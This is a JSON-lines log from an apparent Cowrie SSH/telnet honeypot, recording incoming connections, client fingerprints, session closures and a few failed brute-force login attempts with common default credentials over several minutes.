{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:35:44.401969Z","src_ip":"196.251.115.108","session":"1cb201e159cf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:35:44.402691Z","src_ip":"196.251.115.108","session":"1cb201e159cf"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567","message":"login attempt [ftpuser/1234567] failed","sensor":"my-vps","timestamp":"2025-08-24T23:35:48.049618Z","src_ip":"196.251.115.108","session":"1cb201e159cf"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:35:49.269973Z","src_ip":"196.251.115.108","session":"1cb201e159cf"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50938,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3f556acc695","protocol":"ssh","message":"New connection: 217.72.205.35:50938 (1.2.3.4:22) [session: b3f556acc695]","sensor":"my-vps","timestamp":"2025-08-24T23:36:23.428115Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:36:23.429259Z","src_ip":"217.72.205.35","session":"b3f556acc695"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":59730,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc5f2679895c","protocol":"ssh","message":"New connection: 196.251.115.108:59730 (1.2.3.4:22) [session: dc5f2679895c]","sensor":"my-vps","timestamp":"2025-08-24T23:36:35.501643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:36:35.939045Z","src_ip":"196.251.115.108","session":"dc5f2679895c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:36:35.949647Z","src_ip":"196.251.115.108","session":"dc5f2679895c"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59701,"dst_ip":"1.2.3.4","dst_port":23,"session":"1de08672a5e7","protocol":"telnet","message":"New connection: 60.22.179.111:59701 (1.2.3.4:23) [session: 1de08672a5e7]","sensor":"my-vps","timestamp":"2025-08-24T23:36:37.266119Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59707,"dst_ip":"1.2.3.4","dst_port":23,"session":"e00edfca81df","protocol":"telnet","message":"New connection: 60.22.179.111:59707 (1.2.3.4:23) [session: e00edfca81df]","sensor":"my-vps","timestamp":"2025-08-24T23:36:38.380741Z"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T23:36:38.956167Z","src_ip":"196.251.115.108","session":"dc5f2679895c"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:36:40.172486Z","src_ip":"196.251.115.108","session":"dc5f2679895c"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59720,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f8839dc39e1","protocol":"telnet","message":"New connection: 60.22.179.111:59720 (1.2.3.4:23) [session: 0f8839dc39e1]","sensor":"my-vps","timestamp":"2025-08-24T23:36:40.484825Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59877,"dst_ip":"1.2.3.4","dst_port":23,"session":"86d86e0467b5","protocol":"telnet","message":"New connection: 60.22.179.111:59877 (1.2.3.4:23) [session: 86d86e0467b5]","sensor":"my-vps","timestamp":"2025-08-24T23:36:44.602856Z"}
{"eventid":"cowrie.session.closed","duration":13.066617727279663,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:36:50.332665Z","src_ip":"60.22.179.111","session":"1de08672a5e7"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59908,"dst_ip":"1.2.3.4","dst_port":23,"session":"7db2ce3b329a","protocol":"telnet","message":"New connection: 60.22.179.111:59908 (1.2.3.4:23) [session: 7db2ce3b329a]","sensor":"my-vps","timestamp":"2025-08-24T23:36:50.500681Z"}
{"eventid":"cowrie.session.closed","duration":12.805118560791016,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:36:51.185782Z","src_ip":"60.22.179.111","session":"e00edfca81df"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59917,"dst_ip":"1.2.3.4","dst_port":23,"session":"74e372ca2fd1","protocol":"telnet","message":"New connection: 60.22.179.111:59917 (1.2.3.4:23) [session: 74e372ca2fd1]","sensor":"my-vps","timestamp":"2025-08-24T23:36:51.388022Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59923,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fbf8d100858","protocol":"telnet","message":"New connection: 60.22.179.111:59923 (1.2.3.4:23) [session: 9fbf8d100858]","sensor":"my-vps","timestamp":"2025-08-24T23:36:52.941289Z"}
{"eventid":"cowrie.session.closed","duration":13.033907651901245,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:36:53.518642Z","src_ip":"60.22.179.111","session":"0f8839dc39e1"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":59936,"dst_ip":"1.2.3.4","dst_port":23,"session":"682498b3a290","protocol":"telnet","message":"New connection: 60.22.179.111:59936 (1.2.3.4:23) [session: 682498b3a290]","sensor":"my-vps","timestamp":"2025-08-24T23:36:53.744594Z"}
{"eventid":"cowrie.session.closed","duration":13.78264045715332,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:36:58.385414Z","src_ip":"60.22.179.111","session":"86d86e0467b5"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60077,"dst_ip":"1.2.3.4","dst_port":23,"session":"1099dbbf126c","protocol":"telnet","message":"New connection: 60.22.179.111:60077 (1.2.3.4:23) [session: 1099dbbf126c]","sensor":"my-vps","timestamp":"2025-08-24T23:36:58.583045Z"}
{"eventid":"cowrie.session.closed","duration":13.924525499343872,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:04.425137Z","src_ip":"60.22.179.111","session":"7db2ce3b329a"}
{"eventid":"cowrie.session.closed","duration":13.042822360992432,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:04.430767Z","src_ip":"60.22.179.111","session":"74e372ca2fd1"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60131,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0512f477d6d","protocol":"telnet","message":"New connection: 60.22.179.111:60131 (1.2.3.4:23) [session: b0512f477d6d]","sensor":"my-vps","timestamp":"2025-08-24T23:37:04.597240Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60132,"dst_ip":"1.2.3.4","dst_port":23,"session":"5416b8a8a894","protocol":"telnet","message":"New connection: 60.22.179.111:60132 (1.2.3.4:23) [session: 5416b8a8a894]","sensor":"my-vps","timestamp":"2025-08-24T23:37:04.609752Z"}
{"eventid":"cowrie.session.closed","duration":13.52032732963562,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:06.461523Z","src_ip":"60.22.179.111","session":"9fbf8d100858"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60240,"dst_ip":"1.2.3.4","dst_port":23,"session":"d2e64012c216","protocol":"telnet","message":"New connection: 60.22.179.111:60240 (1.2.3.4:23) [session: d2e64012c216]","sensor":"my-vps","timestamp":"2025-08-24T23:37:06.558893Z"}
{"eventid":"cowrie.session.closed","duration":13.449064254760742,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:07.193591Z","src_ip":"60.22.179.111","session":"682498b3a290"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60244,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d81c3825e1d","protocol":"telnet","message":"New connection: 60.22.179.111:60244 (1.2.3.4:23) [session: 2d81c3825e1d]","sensor":"my-vps","timestamp":"2025-08-24T23:37:07.368843Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60248,"dst_ip":"1.2.3.4","dst_port":23,"session":"192198c77ab7","protocol":"telnet","message":"New connection: 60.22.179.111:60248 (1.2.3.4:23) [session: 192198c77ab7]","sensor":"my-vps","timestamp":"2025-08-24T23:37:08.985277Z"}
{"eventid":"cowrie.session.closed","duration":13.640048742294312,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:12.223000Z","src_ip":"60.22.179.111","session":"1099dbbf126c"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60278,"dst_ip":"1.2.3.4","dst_port":23,"session":"60ba594f6796","protocol":"telnet","message":"New connection: 60.22.179.111:60278 (1.2.3.4:23) [session: 60ba594f6796]","sensor":"my-vps","timestamp":"2025-08-24T23:37:12.379683Z"}
{"eventid":"cowrie.session.closed","duration":14.067119121551514,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:18.664291Z","src_ip":"60.22.179.111","session":"b0512f477d6d"}
{"eventid":"cowrie.session.closed","duration":14.062626600265503,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:18.672317Z","src_ip":"60.22.179.111","session":"5416b8a8a894"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60437,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e0f7fcd4f7a","protocol":"telnet","message":"New connection: 60.22.179.111:60437 (1.2.3.4:23) [session: 5e0f7fcd4f7a]","sensor":"my-vps","timestamp":"2025-08-24T23:37:18.823925Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60438,"dst_ip":"1.2.3.4","dst_port":23,"session":"9615f012a8fd","protocol":"telnet","message":"New connection: 60.22.179.111:60438 (1.2.3.4:23) [session: 9615f012a8fd]","sensor":"my-vps","timestamp":"2025-08-24T23:37:18.881656Z"}
{"eventid":"cowrie.session.closed","duration":12.996086120605469,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:19.554908Z","src_ip":"60.22.179.111","session":"d2e64012c216"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60445,"dst_ip":"1.2.3.4","dst_port":23,"session":"57c9b97777a6","protocol":"telnet","message":"New connection: 60.22.179.111:60445 (1.2.3.4:23) [session: 57c9b97777a6]","sensor":"my-vps","timestamp":"2025-08-24T23:37:19.876492Z"}
{"eventid":"cowrie.session.closed","duration":13.306591987609863,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:20.675364Z","src_ip":"60.22.179.111","session":"2d81c3825e1d"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60451,"dst_ip":"1.2.3.4","dst_port":23,"session":"65bc3df578a2","protocol":"telnet","message":"New connection: 60.22.179.111:60451 (1.2.3.4:23) [session: 65bc3df578a2]","sensor":"my-vps","timestamp":"2025-08-24T23:37:20.892361Z"}
{"eventid":"cowrie.session.closed","duration":13.81662392616272,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:22.801807Z","src_ip":"60.22.179.111","session":"192198c77ab7"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60459,"dst_ip":"1.2.3.4","dst_port":23,"session":"9d82dd1bb4a9","protocol":"telnet","message":"New connection: 60.22.179.111:60459 (1.2.3.4:23) [session: 9d82dd1bb4a9]","sensor":"my-vps","timestamp":"2025-08-24T23:37:22.951800Z"}
{"eventid":"cowrie.session.closed","duration":13.030477046966553,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:25.410085Z","src_ip":"60.22.179.111","session":"60ba594f6796"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60482,"dst_ip":"1.2.3.4","dst_port":23,"session":"3635886b07c2","protocol":"telnet","message":"New connection: 60.22.179.111:60482 (1.2.3.4:23) [session: 3635886b07c2]","sensor":"my-vps","timestamp":"2025-08-24T23:37:25.624159Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":36706,"dst_ip":"1.2.3.4","dst_port":22,"session":"a95cac493571","protocol":"ssh","message":"New connection: 196.251.115.108:36706 (1.2.3.4:22) [session: a95cac493571]","sensor":"my-vps","timestamp":"2025-08-24T23:37:26.498028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T23:37:26.850106Z","src_ip":"196.251.115.108","session":"a95cac493571"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T23:37:26.851046Z","src_ip":"196.251.115.108","session":"a95cac493571"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"password","message":"login attempt [mysql/password] failed","sensor":"my-vps","timestamp":"2025-08-24T23:37:30.660359Z","src_ip":"196.251.115.108","session":"a95cac493571"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:31.924968Z","src_ip":"196.251.115.108","session":"a95cac493571"}
{"eventid":"cowrie.session.closed","duration":13.489543437957764,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:32.371116Z","src_ip":"60.22.179.111","session":"9615f012a8fd"}
{"eventid":"cowrie.session.closed","duration":13.54896068572998,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:32.372808Z","src_ip":"60.22.179.111","session":"5e0f7fcd4f7a"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60640,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff184530ba9c","protocol":"telnet","message":"New connection: 60.22.179.111:60640 (1.2.3.4:23) [session: ff184530ba9c]","sensor":"my-vps","timestamp":"2025-08-24T23:37:32.539022Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60641,"dst_ip":"1.2.3.4","dst_port":23,"session":"dadf31cc64fc","protocol":"telnet","message":"New connection: 60.22.179.111:60641 (1.2.3.4:23) [session: dadf31cc64fc]","sensor":"my-vps","timestamp":"2025-08-24T23:37:32.574077Z"}
{"eventid":"cowrie.session.closed","duration":13.886449337005615,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:33.762852Z","src_ip":"60.22.179.111","session":"57c9b97777a6"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60656,"dst_ip":"1.2.3.4","dst_port":23,"session":"2337914ecea3","protocol":"telnet","message":"New connection: 60.22.179.111:60656 (1.2.3.4:23) [session: 2337914ecea3]","sensor":"my-vps","timestamp":"2025-08-24T23:37:33.876097Z"}
{"eventid":"cowrie.session.closed","duration":13.418524026870728,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:34.310812Z","src_ip":"60.22.179.111","session":"65bc3df578a2"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60657,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7b1fee5c93c","protocol":"telnet","message":"New connection: 60.22.179.111:60657 (1.2.3.4:23) [session: f7b1fee5c93c]","sensor":"my-vps","timestamp":"2025-08-24T23:37:34.501650Z"}
{"eventid":"cowrie.session.closed","duration":13.660745859146118,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:36.612463Z","src_ip":"60.22.179.111","session":"9d82dd1bb4a9"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60682,"dst_ip":"1.2.3.4","dst_port":23,"session":"e35577d2997b","protocol":"telnet","message":"New connection: 60.22.179.111:60682 (1.2.3.4:23) [session: e35577d2997b]","sensor":"my-vps","timestamp":"2025-08-24T23:37:36.773075Z"}
{"eventid":"cowrie.session.closed","duration":13.788625240325928,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:39.411867Z","src_ip":"60.22.179.111","session":"3635886b07c2"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60799,"dst_ip":"1.2.3.4","dst_port":23,"session":"676f5b88df01","protocol":"telnet","message":"New connection: 60.22.179.111:60799 (1.2.3.4:23) [session: 676f5b88df01]","sensor":"my-vps","timestamp":"2025-08-24T23:37:39.580442Z"}
{"eventid":"cowrie.session.closed","duration":13.949930429458618,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:46.488862Z","src_ip":"60.22.179.111","session":"ff184530ba9c"}
{"eventid":"cowrie.session.closed","duration":13.915756940841675,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:46.489754Z","src_ip":"60.22.179.111","session":"dadf31cc64fc"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60844,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e427a5acdad","protocol":"telnet","message":"New connection: 60.22.179.111:60844 (1.2.3.4:23) [session: 0e427a5acdad]","sensor":"my-vps","timestamp":"2025-08-24T23:37:46.653304Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60843,"dst_ip":"1.2.3.4","dst_port":23,"session":"17146f06e628","protocol":"telnet","message":"New connection: 60.22.179.111:60843 (1.2.3.4:23) [session: 17146f06e628]","sensor":"my-vps","timestamp":"2025-08-24T23:37:46.675484Z"}
{"eventid":"cowrie.session.closed","duration":13.306499719619751,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:47.182528Z","src_ip":"60.22.179.111","session":"2337914ecea3"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60862,"dst_ip":"1.2.3.4","dst_port":23,"session":"19c38c57c6fb","protocol":"telnet","message":"New connection: 60.22.179.111:60862 (1.2.3.4:23) [session: 19c38c57c6fb]","sensor":"my-vps","timestamp":"2025-08-24T23:37:47.342432Z"}
{"eventid":"cowrie.session.closed","duration":14.000977039337158,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:48.502554Z","src_ip":"60.22.179.111","session":"f7b1fee5c93c"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60969,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8fafa1d963e","protocol":"telnet","message":"New connection: 60.22.179.111:60969 (1.2.3.4:23) [session: e8fafa1d963e]","sensor":"my-vps","timestamp":"2025-08-24T23:37:48.698292Z"}
{"eventid":"cowrie.session.closed","duration":13.640077114105225,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:50.413074Z","src_ip":"60.22.179.111","session":"e35577d2997b"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60983,"dst_ip":"1.2.3.4","dst_port":23,"session":"7da6e2fdcca7","protocol":"telnet","message":"New connection: 60.22.179.111:60983 (1.2.3.4:23) [session: 7da6e2fdcca7]","sensor":"my-vps","timestamp":"2025-08-24T23:37:50.559113Z"}
{"eventid":"cowrie.session.closed","duration":13.868425846099854,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:37:53.448801Z","src_ip":"60.22.179.111","session":"676f5b88df01"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":60998,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ab964302660","protocol":"telnet","message":"New connection: 60.22.179.111:60998 (1.2.3.4:23) [session: 2ab964302660]","sensor":"my-vps","timestamp":"2025-08-24T23:37:53.634304Z"}
{"eventid":"cowrie.session.closed","duration":12.929576873779297,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:00.271934Z","src_ip":"60.22.179.111","session":"19c38c57c6fb"}
{"eventid":"cowrie.session.closed","duration":13.656148433685303,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:00.331552Z","src_ip":"60.22.179.111","session":"17146f06e628"}
{"eventid":"cowrie.session.closed","duration":13.679336071014404,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:00.332528Z","src_ip":"60.22.179.111","session":"0e427a5acdad"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":32933,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccea22e47360","protocol":"telnet","message":"New connection: 60.22.179.111:32933 (1.2.3.4:23) [session: ccea22e47360]","sensor":"my-vps","timestamp":"2025-08-24T23:38:00.421161Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":32935,"dst_ip":"1.2.3.4","dst_port":23,"session":"606ca8111564","protocol":"telnet","message":"New connection: 60.22.179.111:32935 (1.2.3.4:23) [session: 606ca8111564]","sensor":"my-vps","timestamp":"2025-08-24T23:38:00.494626Z"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":32934,"dst_ip":"1.2.3.4","dst_port":23,"session":"0c127e0035e6","protocol":"telnet","message":"New connection: 60.22.179.111:32934 (1.2.3.4:23) [session: 0c127e0035e6]","sensor":"my-vps","timestamp":"2025-08-24T23:38:00.518574Z"}
{"eventid":"cowrie.session.closed","duration":13.884453535079956,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:02.582627Z","src_ip":"60.22.179.111","session":"e8fafa1d963e"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":32945,"dst_ip":"1.2.3.4","dst_port":23,"session":"8be32ed1a804","protocol":"telnet","message":"New connection: 60.22.179.111:32945 (1.2.3.4:23) [session: 8be32ed1a804]","sensor":"my-vps","timestamp":"2025-08-24T23:38:02.729559Z"}
{"eventid":"cowrie.session.closed","duration":13.826780557632446,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:04.385827Z","src_ip":"60.22.179.111","session":"7da6e2fdcca7"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":32953,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab9bce03dfb5","protocol":"telnet","message":"New connection: 60.22.179.111:32953 (1.2.3.4:23) [session: ab9bce03dfb5]","sensor":"my-vps","timestamp":"2025-08-24T23:38:04.636754Z"}
{"eventid":"cowrie.session.closed","duration":13.990747213363647,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:07.624970Z","src_ip":"60.22.179.111","session":"2ab964302660"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":32980,"dst_ip":"1.2.3.4","dst_port":23,"session":"10774fe58947","protocol":"telnet","message":"New connection: 60.22.179.111:32980 (1.2.3.4:23) [session: 10774fe58947]","sensor":"my-vps","timestamp":"2025-08-24T23:38:07.820338Z"}
{"eventid":"cowrie.session.closed","duration":12.720120906829834,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:13.238630Z","src_ip":"60.22.179.111","session":"0c127e0035e6"}
{"eventid":"cowrie.session.closed","duration":12.749783277511597,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T23:38:13.244330Z","src_ip":"60.22.179.111","session":"606ca8111564"}
{"eventid":"cowrie.session.connect","src_ip":"60.22.179.111","src_port":33125,"dst_ip":"1.2.3.4","dst_port":23,"session":"eac5906f0296","protocol":"telnet","message":"New connection: 60.22.179.111:33125 (1.2.3.4:23) [session: eac5906f0296]","sensor":"my-vps","timestamp":"2025-08-24T23:38:13.457899Z"}
